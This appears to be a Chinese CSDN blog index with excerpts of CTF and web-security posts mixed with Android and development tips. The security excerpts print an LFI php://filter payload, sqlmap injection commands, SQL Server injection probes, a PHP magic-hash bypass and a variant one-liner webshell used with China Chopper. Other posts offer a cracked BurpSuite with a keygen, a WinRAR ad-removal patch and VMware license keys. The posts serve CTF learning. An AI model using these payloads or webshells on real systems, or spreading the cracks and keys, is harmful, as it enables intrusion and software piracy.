- 博客(25)
- 资源 (28)
- 收藏
- 关注
原创 CTF用到的网站
1. XSSEE(用于网址编解码查看): https://web2hack.org/xssee/2. 解密/加密JS/VBS/ASP代码: https://www.dheart.net/decode/ http://tool.webmasterhome.cn/Encode.asp3.加密解密aaencode: 加密: http://utf-...
2018-07-29 13:17:07 7545
原创 【CTF】LFI漏洞总结(PHP本地文件包含漏洞)
学习链接: https://www.cnblogs.com/wh4am1/p/6542398.html 发现地址后面的参数直接使用的文件包含。 ?file=show.php为了查看index.php的源文件, 可以使用下面的命令:rlfi.php ?language=php://filter/read=convert.base64-encode/resource=index.p...
2018-07-31 13:15:51 11030
转载 【CTF】X-Forwarded-For SQL注入实战
1.首先burp抓包,分析post包,保存为txt文件(可看这个 https://blog.csdn.net/u014549283/article/details/81290015 ,此处用 -r 参数)2、使用sqlmap进行注入爆数据库sqlmap -r xxx.txt --dbs --batch 爆表名sqlmap -r xxx.txt -D 数据库名 --tab...
2018-07-30 18:37:00 4658
转载 【CTF】sqlmap之POST注入的两种方法(-r 和--data)
用sqlmap进行做post注入测试的时候,发现这么一种情况:对POST请求,之前一直用 “-r txt文件”的形式,进行注入测试;发现还有另一种POST,用“-r txt文件”的形式进行却无效,原来可以通过“--data="key=value"”来进行测试注入。 故以上两种情况都是post的,却还是有区别的 故此记录如下:1:POST注入时,什么时候用“-r txt文...
2018-07-30 18:35:22 8320
原创 【CTF】PHP Hash漏洞(关于0e开头的md5值)
原题(PHP代码分析溯源)<?php$md51 = md5('QNKCDZO');$a = @$_GET['a'];$md52 = @md5($a);if(isset($a)){if ($a != 'QNKCDZO' && $md51 == $md52) { echo "nctf{*****************}";} else { ec...
2018-07-30 17:16:47 12255
转载 【Web】浏览器信息伪造--User-Agent及NetType微信网络检测
【Web】浏览器信息伪造--User-Agent及NetType微信网络检测User-Agent(用户代理)字符串是Web浏览器用于声明自身型号版本并随HTTP请求发送给Web服务器的字符串,在Web服务器上可以获取到该字符串。 从微信6.0开始,其内嵌的浏览器在UserAgent字符串中增加了NetType字段用于标识客户端(手机)当前的网络环境,经测试,该字段至少有以下3个取...
2018-07-30 13:35:28 6499
原创 【Web】SQL手工注入Sql Server数据库 (漏洞测试)
【Web】SQL手工注入Sql Server数据库 (漏洞测试)第一步:判断是否有注入,?id=2 and 1=1 正确;id=2 and 1=2 错误,得出有注入点。第二步:判断数据库类型:?id=2 and exists (select * from sysobjects) 显示正常, 表示是ms sql server数据库。第三步:sqlmap...
2018-07-30 13:21:59 3864
原创 【Web】SQLMap的tamper的使用
【Web】SQLMap的tamper的使用1.如果需要ID后面base64编码 则另加 --tamper=base64encode 命令
2018-07-29 18:36:22 4774
原创 【Web】变种一句话木马--中国菜刀连接
【Web】变种一句话木马--中国菜刀连接遇到这种文件:<?phperror_reporting(0);$_GET['POST']($_POST['GET']);?>就是变种的一句话木马 在php网址后面加上 ?POST=assert编辑栏密码为GET连接即可 或者 <?php $POST['POST']='assert...
2018-07-29 18:11:38 8651 2
原创 【Web】内部文件上传系统漏洞分析溯源(获取shell)
【准备工具】1.中国菜刀 (可以去官网下载)官网:http://www.maicaidao.co/ (不建议使用) https://download.csdn.net/download/u014549283/105709762.BurpPro3.火狐浏览器的FoxyProxy Standard插件【技术要点】1.新建一句话代码,比如1.txt,内容选择如下...
2018-07-29 17:19:33 3541 1
原创 去除WinRar的广告
非注册版的winrar打开一个压缩包以后会有广告,可以选择下载注册破解过的版本,本文采用修改的方法去除广告。【解决方法】:1.下载 ResourceHackerhttps://download.csdn.net/download/u014549283/105707252.运行ResourceHacker.exe 然后点击【文件】-【打开】3.选择安装目录下面的WinRAR...
2018-07-29 13:57:30 8669 3
转载 虚拟机安装kali linux
虚拟机安装kali linuxlinux镜像下载地址http://man.linuxde.net/download/Ubuntu_16_041.安装VM pro14,密钥如下:CG54H-D8D0H-H8DHY-C6X7X-N2KG6ZC3WK-AFXEK-488JP-A7MQX-XL8YFAC5...
2018-07-29 11:58:04 3379
原创 火狐浏览器历史版本下载
火狐浏览器历史版本下载http://http://ftp.mozilla.org/pub/firefox/releases/50.0b11/
2018-07-27 18:45:58 6652 2
原创 BurpSuite 破解版(含注册机,无后门)下载注册详细教程
最近用到Burp,于是找了下吾爱破解上的注册机的原版,也就是没有后门的版本。顺带贴一个教程。仅供学习交流使用!!1. BurpSuite 1.7 原版+注册机 下载地址: csdn已经上传了 https://download.csdn.net/download/u014549283/10568556百度云:链接:https://pan.baidu.com/s/1ZGQc...
2018-07-27 17:45:35 137307 54
原创 【解惑】Android将jks签名文件转为keystore
【解惑】Android将jks签名文件转为keystore首先把jks文件转为p12信息文件 keytool -importkeystore -srckeystore D:\happy.jks -srcstoretype JKS -deststoretype PKCS12 -destkeystore D:\happy.p12然后把p12文件转为keystore文件keytool...
2018-07-24 18:38:17 7763
原创 GitBash的简单使用方法
GitBash的简单使用方法 首先进行git clone “git项目地址” 添加,修改文件 使用git status来获取状态信息 使用git add . 添加所有文件 使用git commit -m "注释" 提交到本地仓库 使用push来推送到远程仓库,期间需要输入账号密码来进行验证。 ...
2018-07-24 16:18:10 4279
原创 解决使用okhttp3报java.lang.IllegalStateException: closed
解决使用okhttp3报java.lang.IllegalStateException: closed 【解决方法】在调用了response.body().string()方法之后,response中的流会被关闭,即response.body().string()只能使用一次,我们可以把它保存起来 传递给上一个调用方。 ...
2018-07-23 22:22:16 3919
转载 如何在Github上在线创建文件夹
如何在Github上在线创建文件夹 点击CreateNew files按钮,在上方的文件名中先输入目录名,然后在文件名末尾加上“/”就自动会建立一个文件夹。 点击Upload files按钮,然后直接把本地的文件夹(内含文件)拖进去批处理上传。 ...
2018-07-23 19:52:04 3505
原创 【解惑】SwitchPreferenceCompat通过findPreference()无法正常使用
【解惑】SwitchPreferenceCompat通过findPreference()无法正常使用 使用preferences2= (SwitchPreferenceCompat) findPreference("SwitchPreference");出现Caused by: java.lang.NullPointerException: Attempt to invoke v...
2018-07-23 14:31:10 4833
转载 色温所对及应的RGB颜色表
色温所对及应的RGB颜色表 1000 K 2deg 0.6499 0.3474 2.472e+06 1.0000 0.0337 0.0000 255 51 0 #ff3300 1000 K 10deg 0.6472 0.3506 2.525e+06 1.0000 0.04...
2018-07-21 21:01:53 80572 4
原创 Android护眼模式、屏幕亮度调节功能开发【基于Android8.0】
Android护眼模式、屏幕亮度调节功能开发【基于Android8.0】【引言】网上关于写护眼模式,屏幕亮度调节的android的方法很少,找到的都不能很好的适配Android8.0的版本。于是自己查了很多api文档,研究了一下方法。【功能实现】就像很多护眼模式的app一样,都是基于开启悬浮窗的方法。相当于弄一个全屏的,半透明的黄色的 悬浮窗遮罩。我们需要把屏幕亮度调节的做成服务,为了...
2018-07-20 15:43:55 9223 6
原创 【解惑】Android将悬浮窗显示在通知栏之上
【解惑】Android将悬浮窗显示在通知栏之上解决方法:在flag的参数中加上WindowManager.LayoutParams.FLAG_LAYOUT_IN_SCREEN这个参数比如int flags=WindowManager.LayoutParams.FLAG_NOT_TOUCH_MODAL|WindowManager.LayoutPara...
2018-07-20 15:21:09 7303
原创 【解惑】myeclipse可以创建的项目中没有Dynamic Web Project项目
【解惑】myeclipse可以创建的项目中没有Dynamic Web Project项目我们直接点击file>new>的命令 看不到有Dynamic Web Project,这是因为现在的myeclipse的web项目集成了原先eclipse的动态web项目,而且功能更 多。我们只需要创建web project就可以满足需要了。 如果一...
2018-07-18 11:26:57 12504 3
原创 解决双击启动tomcat的bin目录下的startup.bat闪退问题
解决双击启动tomcat的bin目录下的startup.bat闪退问题第一次解压Tomcat文件夹后,直接双击运行bin目录下面的startup.bat会出现命令提示符一闪而过的情况,这说明tomcat的环境没有配置好。(我们可以在startup.bat文件末尾加一行 pause 的代码,可以查看错误信息,保持命令提示符存在) 解决方法:在系统...
2018-07-16 21:34:53 32538 12
beacon simulator(beacon蓝牙BLE信号模拟)
2019-04-25
VMwareTools-9.6.2-1688356.tar
2019-04-06
dosbox和link.exe和masm.exe以及debug.exe的整合版
2018-09-22
VirtualXposed_0.13.0
2018-08-26
写轮眼app汉化版
2018-08-22
ResourceHacker
2018-07-29
友盟SDK集成辅助工具
2018-07-23
色温所对及应的RGB颜色表
2018-07-21
Unity 5.X从入门到精通 PDF
2018-07-19
Sakura frpc windows64位客户端
2018-07-17
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人